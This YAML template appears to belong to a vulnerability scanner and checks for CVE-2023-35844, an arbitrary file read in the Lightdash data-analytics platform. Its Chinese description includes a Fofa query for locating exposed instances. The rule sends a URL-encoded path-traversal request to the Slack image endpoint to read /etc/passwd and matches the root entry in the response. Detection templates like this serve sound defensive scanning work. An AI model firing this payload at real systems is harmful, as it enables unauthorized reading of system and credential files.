id: CVE-2023-35844

info:
  name: Lightdash Arbitrary File Read
  author: laohuan12138
  severity: high
  verified: true
  description: |
    Lightdash是一款数据分析平台，它可以让数据团队和其他业务部门聚集在一起以做出更好的数据驱动决策
    Lightdash 0.510.3之前版本存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。
    Fofa: title=="Lightdash"
    
  reference:
    - https://mp.weixin.qq.com/s/QflYIUwjvrPbrsxrgPp3ew

  tags: cve,cve2023,lfi
  created: 2023/06/26

rules:
  r0:
    request:
      method: GET
      path: /api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0()